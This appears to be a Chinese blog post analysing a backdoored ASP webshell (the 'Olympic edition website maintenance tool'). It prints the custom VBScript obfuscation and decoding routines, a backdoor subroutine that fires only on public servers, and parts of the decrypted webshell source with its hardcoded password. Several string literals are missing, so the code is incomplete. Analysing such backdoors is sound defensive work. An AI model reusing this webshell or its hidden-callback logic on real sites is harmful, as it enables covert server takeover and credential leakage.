• 欢迎访问金刀客博客!
  • 2019,春节快乐!

解密的奥运专版网站维护工具(加强版)及后门全分析

原创天空 admin 9682次浏览 已收录 0个评论

这个shell的界面还是不错的,清爽淡雅,可惜后门还是大大的。

这个程序的加密较为复杂,除了常规的VBScript.Encode加密外,还采用了至少3个自定义函数加密。这3个函数的解密函数为

Function MorfiCoder(Code)
MorfiCoder = Replace(Replace(StrReverse(Code),”/*/”, Chr(34)),”\*\”, vbCrLf)
End Function
Function UZSS(objstr)
objstr = Replace(objstr, “`”, “”””):For i = 1 To Len(objstr):If Mid(objstr, i, 1) <> “~” Then
NewStr = Mid(objstr, i, 1) & NewStr
Else
NewStr = vbCrLf & NewStr
End If
Next
UZSS = NewStr
End Function
Function MorfiCoder1(password, MorfiCode)
Dim MIN_Morfi,MAX_Morfi,NUM_Morfi,offset,Str_len,i,code,To_TxT
MIN_Morfi = 32
MAX_Morfi = 126
NUM_Morfi = MAX_Morfi – MIN_Morfi + 1
offset = password
Rnd -1
Randomize offset
MorfiCode = Replace(MorfiCode, “/*/”, Chr(34))
Str_len = Len(MorfiCode)
For i = 1 To Str_len
Code = Asc(Mid(MorfiCode, i, 1))
If Code >= MIN_Morfi And Code <= MAX_Morfi Then Code = Code - MIN_Morfi offset = Int((NUM_Morfi + 1) * Rnd) Code = ((Code - offset) Mod NUM_Morfi) If Code < 0 Then Code = Code + NUM_Morfi Code = Code + MIN_Morfi To_TxT = To_TxT & Chr(Code) MorfiCoder1 = Replace(To_TxT, "\*\", vbCrLf) Else To_TxT = To_TxT & Chr(Code) MorfiCoder1 = Replace(To_TxT, "\*\", vbCrLf) End If Next End Function

这个shell的后门和前面几个shell的后门相差无几。
代码为

sub Tallax()
Dim MorfiCode
morfi=”
if instr(Request.ServerVariables(“SERVER_NAME”),”127.0.0.1″)<>0 then morfi=””
if instr(Request.ServerVariables(“SERVER_NAME”),”192.168.”)<>0 then morfi=””
if instr(Request.ServerVariables(“SERVER_NAME”),”localhost”)<>0 then morfi=””
echo morfi
end sub

是一个子过程,在显示主窗口时首先调用

Function MainForm()
call Tallax()
echo”


echo”
echo”
echo”


……….

这个后门可以智能判断此shell是在本地、内网或者外网运行。如果不是外网就不要了。
这个后门地址解密出来就是

和前几篇文章的参数相同,收信方式相同,域名相似。
贴解密源码,加密文档和明文文档打包传附件。

<%@ LANGUAGE = VBScript %>
<% UserPass="20080808" 'PASSWORD VerName="奥运专版网站维护工具(加强版)" '版权 Ver="注:请小心使用此软件。如误操作造成不良后果,作者概不负责" '声明 StateName="" '状态栏文字 Server.ScriptTimeout=999999999:Response.Buffer =true:On Error Resume Next sub ShowErr() Dim MorfiCode If Err Then echo"

 ” & Err.Description & “


Err.Clear
Response.Flush
End If
end sub
Function MorfiCoder(Code)
MorfiCoder = Replace(Replace(StrReverse(Code),”/*/”, Chr(34)),”\*\”, vbCrLf)
End Function
Sub echo(str)
response.write(str)
End Sub
function face(Color,Siz,Var)
if Siz=0 then
siz=””
else
siz=” size='”&Siz&”‘”
end if
face=”“&Var&”
End function
Dim kge
kge=”


posurl=”http”
sub Css()
echo “


end sub
Function UZSS(objstr)
objstr = Replace(objstr, “`”, “”””):For i = 1 To Len(objstr):If Mid(objstr, i, 1) <> “~” Then
NewStr = Mid(objstr, i, 1) & NewStr
Else
NewStr = vbCrLf & NewStr
End If
Next
UZSS = NewStr
End Function
sub Tallax()
Dim MorfiCode
morfi=”
if instr(Request.ServerVariables(“SERVER_NAME”),”127.0.0.1″)<>0 then morfi=””
if instr(Request.ServerVariables(“SERVER_NAME”),”192.168.”)<>0 then morfi=””
if instr(Request.ServerVariables(“SERVER_NAME”),”localhost”)<>0 then morfi=””
echo morfi
end sub
Function MorfiCoder1(password, MorfiCode)
Dim MIN_Morfi,MAX_Morfi,NUM_Morfi,offset,Str_len,i,code,To_TxT
MIN_Morfi = 32
MAX_Morfi = 126
NUM_Morfi = MAX_Morfi – MIN_Morfi + 1
offset = password
Rnd -1
Randomize offset
MorfiCode = Replace(MorfiCode, “/*/”, Chr(34))
Str_len = Len(MorfiCode)
For i = 1 To Str_len
Code = Asc(Mid(MorfiCode, i, 1))
If Code >= MIN_Morfi And Code <= MAX_Morfi Then Code = Code - MIN_Morfi offset = Int((NUM_Morfi + 1) * Rnd) Code = ((Code - offset) Mod NUM_Morfi) If Code < 0 Then Code = Code + NUM_Morfi Code = Code + MIN_Morfi To_TxT = To_TxT & Chr(Code) MorfiCoder1 = Replace(To_TxT, "\*\", vbCrLf) Else To_TxT = To_TxT & Chr(Code) MorfiCoder1 = Replace(To_TxT, "\*\", vbCrLf) End If Next End Function sub ResPath() Dim MorfiCode If Session("web2a2dmin") <> UserPass Then
If Request(“Pass”)=”UserPass” Then
Session(“web2a2dmin”) = UserPass
Response.Redirect URL
end if
end if
end sub
Function RePath(S)
RePath=Replace(S,”\”,”\\”)
End Function
Function RRePath(S)
RRePath=Replace(S,”\\”,”\”)
End Function
URL=Request.ServerVariables(“URL”)
ServerIP=Request.ServerVariables(“LOCAL_ADDR”)
Action=Request(“Action”)
RootPath=Server.MapPath(“.”)
WWWRoot=Server.MapPath(“/”)
serveru=request.servervariables(“http_host”)&url
serverp=userpass
FolderPath=Request(“FolderPath”)
FName=Request(“FName”)
BackUrl=”

返回

echo”
echo”“&vername&” – “&ServerIP&”
echo”


…………………………………………………

加密文档
点击下载此文件
最开始出于共享的目的,发布了解密的源码,但是很多朋友劝说我,那么解密文件就不发布了。


金刀客博客 , 版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权 , 转载请注明解密的奥运专版网站维护工具(加强版)及后门全分析
喜欢 (2)
发表我的评论
取消评论

表情 贴图 加粗 删除线 居中 斜体 签到